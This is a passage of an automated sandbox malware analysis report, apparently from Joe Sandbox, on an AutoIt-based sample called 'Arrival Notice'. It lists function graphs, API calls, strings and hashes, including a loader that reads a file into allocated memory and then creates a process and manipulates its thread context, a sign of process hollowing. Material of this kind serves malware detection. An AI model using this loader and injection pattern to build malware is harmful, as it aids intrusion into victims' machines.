                  • API ID:
                  • String ID: D%H$D%H$D%H$D%H$D%HD%H$Variable must be of type 'Object'.
                  • API String ID: 0-1448274001
                  • Opcode ID: d61b96176ff73703de4da4323ca49686f75d3d84599bb1526d0af4d014f21819
                  • Instruction ID: 573f1a5fb0514a320916cc8654f37e977a9069727fabf45a58a602e2b17f3dbb
                  • Opcode Fuzzy Hash: d61b96176ff73703de4da4323ca49686f75d3d84599bb1526d0af4d014f21819
                  • Instruction Fuzzy Hash: 0DC29B75A00214DFCB25DF58C880AEDB7F5BF08308F24856AEA06ABB91D375ED41CB95
                  Function 035225F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1324 35225f0-352269e call 3520000 1327 35226a5-35226cb call 3523500 CreateFileW 1324->1327 1330 35226d2-35226e2 1327->1330 1331 35226cd 1327->1331 1338 35226e4 1330->1338 1339 35226e9-3522703 VirtualAlloc 1330->1339 1332 352281d-3522821 1331->1332 1333 3522863-3522866 1332->1333 1334 3522823-3522827 1332->1334 1340 3522869-3522870 1333->1340 1336 3522833-3522837 1334->1336 1337 3522829-352282c 1334->1337 1343 3522847-352284b 1336->1343 1344 3522839-3522843 1336->1344 1337->1336 1338->1332 1345 3522705 1339->1345 1346 352270a-3522721 ReadFile 1339->1346 1341 3522872-352287d 1340->1341 1342 35228c5-35228da 1340->1342 1347 3522881-352288d 1341->1347 1348 352287f 1341->1348 1349 35228ea-35228f2 1342->1349 1350 35228dc-35228e7 VirtualFree 1342->1350 1351 352285b 1343->1351 1352 352284d-3522857 1343->1352 1344->1343 1345->1332 1353 3522723 1346->1353 1354 3522728-3522768 VirtualAlloc 1346->1354 1357 35228a1-35228ad 1347->1357 1358 352288f-352289f 1347->1358 1348->1342 1350->1349 1351->1333 1352->1351 1353->1332 1355 352276a 1354->1355 1356 352276f-352278a call 3523750 1354->1356 1355->1332 1364 3522795-352279f 1356->1364 1361 35228ba-35228c0 1357->1361 1362 35228af-35228b8 1357->1362 1360 35228c3 1358->1360 1360->1340 1361->1360 1362->1360 1365 35227d2-35227e6 call 3523560 1364->1365 1366 35227a1-35227d0 call 3523750 1364->1366 1372 35227ea-35227ee 1365->1372 1373 35227e8 1365->1373 1366->1364 1374 35227f0-35227f4 FindCloseChangeNotification 1372->1374 1375 35227fa-35227fe 1372->1375 1373->1332 1374->1375 1376 3522800-352280b VirtualFree 1375->1376 1377 352280e-3522817 1375->1377 1376->1377 1377->1327 1377->1332
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 035226C1
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 035228E7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID:
                  • API String ID: 204039940-0
                  • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                  • Instruction ID: 04652f9761664d7676d6cbbacb6a5153ef6a3f84bc8ded0db656c8b7b2390a21
                  • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                  • Instruction Fuzzy Hash: A0A14978E00219EBDB54CFA4D894BEEBBB5BF49304F248959E501BB2D0D7799A40CF90
                  Function 003B2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1388 3b2c63-3b2cd3 CreateWindowExW * 2 ShowWindow * 2
                  APIs
                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003B2C91
                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003B2CB2
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,003B1CAD,?), ref: 003B2CC6
                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,003B1CAD,?), ref: 003B2CCF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$CreateShow
                  • String ID: AutoIt v3$edit
                  • API String ID: 1584632944-3779509399
                  • Opcode ID: 1d23a454898e486629eb1cad7805d92ec01e4b8e48818fb321b1d815ee8afaf8
                  • Instruction ID: e584e66d3a40269d2ba9b82d8a66b8e85c0916e764db6e4e6c4817d567bc0e3a
                  • Opcode Fuzzy Hash: 1d23a454898e486629eb1cad7805d92ec01e4b8e48818fb321b1d815ee8afaf8
                  • Instruction Fuzzy Hash: 2CF017755403907AFB200713AC48EBB6EBDD7C6F50B04042FFD00A21B0C2650842EBB8
                  Function 035223B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1503 35223b0-35224e4 call 3520000 call 35222a0 CreateFileW 1510 35224e6 1503->1510 1511 35224eb-35224fb 1503->1511 1512 352259b-35225a0 1510->1512 1514 3522502-352251c VirtualAlloc 1511->1514 1515 35224fd 1511->1515 1516 3522520-3522537 ReadFile 1514->1516 1517 352251e 1514->1517 1515->1512 1518 352253b-3522575 call 35222e0 call 35212a0 1516->1518 1519 3522539 1516->1519 1517->1512 1524 3522591-3522599 ExitProcess 1518->1524 1525 3522577-352258c call 3522330 1518->1525 1519->1512 1524->1512 1525->1524
                  APIs
                    • Part of subcall function 035222A0: Sleep.KERNELBASE(000001F4), ref: 035222B1
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 035224DA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFileSleep
                  • String ID: NJBSXHNIX02Z5M4N
                  • API String ID: 2694422964-2144519702
                  • Opcode ID: 0f0673376ac532216eac8ea6ab64b239d54f5448e8a709934fb9eed11144504e
                  • Instruction ID: 06b1f26ab79664926cc20475ad30cd17d8b108371bad57378ab4668a818ab5ee
                  • Opcode Fuzzy Hash: 0f0673376ac532216eac8ea6ab64b239d54f5448e8a709934fb9eed11144504e
                  • Instruction Fuzzy Hash: 4951C534E0425DEBEF11DBA4D854BEEBB79AF59300F008599E608BB2C0D7790B05CBA5
                  Function 00422947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1527 422947-4229b9 call 3f1f50 call 4225d6 call 3cfe0b call 3b5722 call 42274e call 3b511f call 3d5232 1542 4229bf-4229c6 call 422e66 1527->1542 1543 422a6c-422a73 call 422e66 1527->1543 1548 422a75-422a77 1542->1548 1549 4229cc-422a6a call 3dd583 call 3d4983 call 3d9038 call 3dd583 call 3d9038 * 2 1542->1549 1543->1548 1550 422a7c 1543->1550 1551 422cb6-422cb7 1548->1551 1553 422a7f-422b3a call 3b50f5 * 8 call 423017 call 3de5eb 1549->1553 1550->1553 1554 422cd5-422cdb 1551->1554 1592 422b43-422b5e call 422792 1553->1592 1593 422b3c-422b3e 1553->1593 1558 422cf0-422cf6 1554->1558 1559 422cdd-422ce8 call 3cfdcd call 3cfe14 1554->1559 1570 422ced 1559->1570 1570->1558 1596 422bf0-422bfc call 3de678 1592->1596 1597 422b64-422b6c 1592->1597 1593->1551 1604 422c12-422c16 1596->1604 1605 422bfe-422c0d DeleteFileW 1596->1605 1598 422b74 1597->1598 1599 422b6e-422b72 1597->1599 1601 422b79-422b97 call 3b50f5 1598->1601 1599->1601 1611 422bc1-422bd7 call 42211d call 3ddbb3 1601->1611 1612 422b99-422b9e 1601->1612 1607 422c91-422ca5 CopyFileW 1604->1607 1608 422c18-422c7e call 4225d6 call 3dd2eb * 2 call 4222ce 1604->1608 1605->1551 1609 422ca7-422cb4 DeleteFileW 1607->1609 1610 422cb9-422ccf DeleteFileW call 422fd8 1607->1610 1608->1610 1632 422c80-422c8f DeleteFileW 1608->1632 1609->1551 1620 422cd4 1610->1620 1627 422bdc-422be7 1611->1627 1616 422ba1-422bb4 call 4228d2 1612->1616 1625 422bb6-422bbf 1616->1625 1620->1554 1625->1611 1627->1597 1629 422bed 1627->1629 1629->1596 1632->1551
                  APIs
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00422C05
                  • DeleteFileW.KERNEL32(?), ref: 00422C87
                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00422C9D
                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00422CAE
                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00422CC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$Delete$Copy
                  • String ID:
                  • API String ID: 3226157194-0
                  • Opcode ID: dd08d603605090707a0e7fedb15127e4ef5abb24cebe4731888a390628e756aa
                  • Instruction ID: 2c9bae37b9972d86c20e7a4a870c9c62e8a223edcc8c29e044024b46c608bccd
                  • Opcode Fuzzy Hash: dd08d603605090707a0e7fedb15127e4ef5abb24cebe4731888a390628e756aa
                  • Instruction Fuzzy Hash: CEB17172E00129BBDF11EFA4DD85EDE7B7DEF09304F4040A6F609E6241EA749A448F65
                  Function 003E5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1907 3e5aa9-3e5ace 1908 3e5ad7-3e5ad9 1907->1908 1909 3e5ad0-3e5ad2 1907->1909 1911 3e5afa-3e5b1f 1908->1911 1912 3e5adb-3e5af5 call 3df2c6 call 3df2d9 call 3e27ec 1908->1912 1910 3e5ca5-3e5cb4 call 3d0a8c 1909->1910 1914 3e5b26-3e5b2c 1911->1914 1915 3e5b21-3e5b24 1911->1915 1912->1910 1919 3e5b2e-3e5b46 call 3df2c6 call 3df2d9 call 3e27ec 1914->1919 1920 3e5b4b 1914->1920 1915->1914 1918 3e5b4e-3e5b53 1915->1918 1923 3e5b64-3e5b6d call 3e564e 1918->1923 1924 3e5b55-3e5b61 call 3e9424 1918->1924 1953 3e5c9c-3e5c9f 1919->1953 1920->1918 1935 3e5b6f-3e5b71 1923->1935 1936 3e5ba8-3e5bba 1923->1936 1924->1923 1941 3e5b95-3e5b9e call 3e542e 1935->1941 1942 3e5b73-3e5b78 1935->1942 1939 3e5bbc-3e5bc2 1936->1939 1940 3e5c02-3e5c23 WriteFile 1936->1940 1947 3e5bc4-3e5bc7 1939->1947 1948 3e5bf2-3e5c00 call 3e56c4 1939->1948 1944 3e5c2e 1940->1944 1945 3e5c25-3e5c2b GetLastError 1940->1945 1954 3e5ba3-3e5ba6 1941->1954 1949 3e5b7e-3e5b8b call 3e55e1 1942->1949 1950 3e5c6c-3e5c7e 1942->1950 1955 3e5c31-3e5c3c 1944->1955 1945->1944 1956 3e5bc9-3e5bcc 1947->1956 1957 3e5be2-3e5bf0 call 3e5891 1947->1957 1948->1954 1962 3e5b8e-3e5b90 1949->1962 1951 3e5c89-3e5c99 call 3df2d9 call 3df2c6 1950->1951 1952 3e5c80-3e5c83 1950->1952 1951->1953 1952->1951 1960 3e5c85-3e5c87 1952->1960 1966 3e5ca4 1953->1966 1954->1962 1963 3e5c3e-3e5c43 1955->1963 1964 3e5ca1 1955->1964 1956->1950 1965 3e5bd2-3e5be0 call 3e57a3 1956->1965 1957->1954 1960->1966 1962->1955 1971 3e5c69 1963->1971 1972 3e5c45-3e5c4a 1963->1972 1964->1966 1965->1954 1966->1910 1971->1950 1976 3e5c4c-3e5c5e call 3df2d9 call 3df2c6 1972->1976 1977 3e5c60-3e5c67 call 3df2a3 1972->1977 1976->1953 1977->1953
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: JO;
                  • API String ID: 0-1151757290
                  • Opcode ID: 96be523a515c48010b8aaba1c5e35fcfa24be2afeb5a6406b23b32234f84d1e2
                  • Instruction ID: 25b96f3815651b7b21828b288fbbe5eefefdebd76b20751ff0ea45d4084e699c
                  • Opcode Fuzzy Hash: 96be523a515c48010b8aaba1c5e35fcfa24be2afeb5a6406b23b32234f84d1e2
                  • Instruction Fuzzy Hash: 27510975D006699FCF139FA6C845FEE7BB8AF05318F15021AF405AB2D2D7719901CB61
                  Function 003B3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,003B3B0F,SwapMouseButtons,00000004,?), ref: 003B3B40
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,003B3B0F,SwapMouseButtons,00000004,?), ref: 003B3B61
                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,003B3B0F,SwapMouseButtons,00000004,?), ref: 003B3B83
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: Control Panel\Mouse
                  • API String ID: 3677997916-824357125
                  • Opcode ID: d83ca5cdd3b3fa09bbebf3c944966fae67f63aa53cad1a5e3ed052c511349dba
                  • Instruction ID: b1151e4812c05a6cb1f3d34cc3ce4805c19d6db4b676686efcf71e6133d937e3
                  • Opcode Fuzzy Hash: d83ca5cdd3b3fa09bbebf3c944966fae67f63aa53cad1a5e3ed052c511349dba
                  • Instruction Fuzzy Hash: F8115AB5511218FFDB21CFA4DC84AEEB7BCEF01748B104569A901D7114D6319E409764
                  Function 035212A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03521A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03521AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03521B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                  • Instruction ID: ecb9fe7a6cd36250cb29284b429ba24ed315619ee9881236c3eded0566274e16
                  • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                  • Instruction Fuzzy Hash: A8622934A14658DBEB24CBA4D840BDEB772FF59300F1091A9D10DEB2E0E7799E81CB59
                  Function 003B3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003F33A2
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003B3A04
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconLoadNotifyShell_String_wcslen
                  • String ID: Line:
                  • API String ID: 2289894680-1585850449
                  • Opcode ID: 16c228e01a5dac3b9e5e4ce8333f000641ba304bb8d5bd85d6fe7d7dded28400
                  • Instruction ID: 9433c35947fece381d51eb78bc48f89d0ecb434dee9f1745fd6926de3fe7d252
                  • Opcode Fuzzy Hash: 16c228e01a5dac3b9e5e4ce8333f000641ba304bb8d5bd85d6fe7d7dded28400
                  • Instruction Fuzzy Hash: 3C31F671508314ABD322EB20DC46BEFB7DCAB40318F10492FF699879A1DB749649C7C6
                  Function 003B2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                  Download Yara Rule
                  APIs
                  • GetOpenFileNameW.COMDLG32(?), ref: 003F2C8C
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                    • Part of subcall function 003B2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B2DC4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Name$Path$FileFullLongOpen
                  • String ID: X$`eG
                  • API String ID: 779396738-1509215119
                  • Opcode ID: 222271487016c5a663cbe9349391a88d1c5d7612ef6392b6bd47e6b70adae88f
                  • Instruction ID: 0ef1363269ad5d6d041014ab491ed963e84c3ab08a52f6a4e6f956b66f15324d
                  • Opcode Fuzzy Hash: 222271487016c5a663cbe9349391a88d1c5d7612ef6392b6bd47e6b70adae88f
                  • Instruction Fuzzy Hash: 6221A571A0025C9FDB02DF95D845BEE7BFDAF49304F00805AE609AB241DBB89A498F65
                  Function 003CFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 003D0668
                    • Part of subcall function 003D32A4: RaiseException.KERNEL32(?,?,?,003D068A,?,00481444,?,?,?,?,?,?,003D068A,003B1129,00478738,003B1129), ref: 003D3304
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 003D0685
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  • Opcode ID: a1a894bbd84f507364a44becf057a4ddb9eb9899ef46697d91ccd997f47290a0
                  • Instruction ID: 3fd5ba6ccba4f6791fec66441c9e963d9d93254e11c9e4c09b75f226870cc6e2
                  • Opcode Fuzzy Hash: a1a894bbd84f507364a44becf057a4ddb9eb9899ef46697d91ccd997f47290a0
                  • Instruction Fuzzy Hash: 76F0283680020D77CB06B674FC4AE9D776DAE00700F604437B814CA695EF30DE25C680
                  Function 00423017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0042302F
                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00423044
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Temp$FileNamePath
                  • String ID: aut
                  • API String ID: 3285503233-3010740371
                  • Opcode ID: 545234886299f8143774d75c8490f7b5bb989b054ed6a64299cdd8f7ff246a82
                  • Instruction ID: f817205db4c0d5d81647cfc36a9dcf6ea1efad07a048e72785b26b48673cb506
                  • Opcode Fuzzy Hash: 545234886299f8143774d75c8490f7b5bb989b054ed6a64299cdd8f7ff246a82
                  • Instruction Fuzzy Hash: DAD05B7590131467DA6097949C4EFC73A6CD705750F0001A17655D2091DAF49544CAD8
                  Function 00437F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004382F5
                  • TerminateProcess.KERNEL32(00000000), ref: 004382FC
                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 004384DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CurrentFreeLibraryTerminate
                  • String ID:
                  • API String ID: 146820519-0
                  • Opcode ID: 6033dc85c32bf8780b75ba0bfeffb818f291782c0f4007ab0db095a55df1e5d7
                  • Instruction ID: 52db8669866ebec36be787ca9225b95ab59064559d43449c7cd89153acb041f3
                  • Opcode Fuzzy Hash: 6033dc85c32bf8780b75ba0bfeffb818f291782c0f4007ab0db095a55df1e5d7
                  • Instruction Fuzzy Hash: 19126B71A083019FC724DF24C484B6AFBE1BF88318F14995EF9898B352DB35E945CB96
                  Function 003B10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B1BF4
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 003B1BFC
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B1C07
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B1C12
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 003B1C1A
                    • Part of subcall function 003B1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 003B1C22
                    • Part of subcall function 003B1B4A: RegisterWindowMessageW.USER32(00000004,?,003B12C4), ref: 003B1BA2
                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003B136A
                  • OleInitialize.OLE32 ref: 003B1388
                  • CloseHandle.KERNEL32(00000000,00000000), ref: 003F24AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                  • String ID:
                  • API String ID: 1986988660-0
                  • Opcode ID: 5605ad770a14ec8427727e531b7fc6961b2b9fef4a380a4a5e980d26e5032228
                  • Instruction ID: b804013e2e1a8cde8e8e83c48fa0e1d9b1fbdbaa8ecb06358eb8c202df8d1e4e
